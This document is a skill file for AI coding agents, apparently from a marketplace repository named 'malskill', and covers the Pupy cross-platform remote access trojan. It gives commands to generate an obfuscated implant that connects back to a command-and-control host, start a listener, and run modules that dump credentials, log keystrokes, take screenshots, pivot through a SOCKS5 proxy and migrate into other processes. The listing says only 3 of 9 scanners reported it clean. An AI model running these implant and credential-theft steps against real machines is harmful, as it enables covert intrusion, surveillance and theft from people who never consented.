offensive-tools/c2/pupy/SKILL.md
Cross-platform remote administration and post-exploitation tool with Python implants. Use when needing a lightweight RAT with in-memory modules, multiple transports (TCP/HTTP/WebSocket), and migration capabilities.
npx skillsauth add aeondave/malskill pupyInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Cross-platform Python RAT with in-memory module loading and multiple C2 transports.
# Docker (recommended)
docker pull n1nj4sec/pupy
docker run -it --rm -p 8443:8443 n1nj4sec/pupy pupysh
# Generate implant
gen -f exe -t obfs3 connect --host C2:8443 -o agent.exe
# Start listener
listen -a obfs3 8443
| Command | Purpose |
|---------|---------|
| sessions | List active sessions |
| interact <id> | Enter session |
| run <module> | Run a post-ex module |
| gen | Generate implant |
| listen | Start listener |
| upload/download | File transfer |
run post.gather.credentials # Dump creds
run post.gather.keylogger # Start keylogger
run post.gather.screenshot # Screenshot
run post.pivot.socks5 # SOCKS5 proxy
run post.migrate # Process migration
| File | When to load |
|------|--------------|
| references/ | Transport config and module index |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.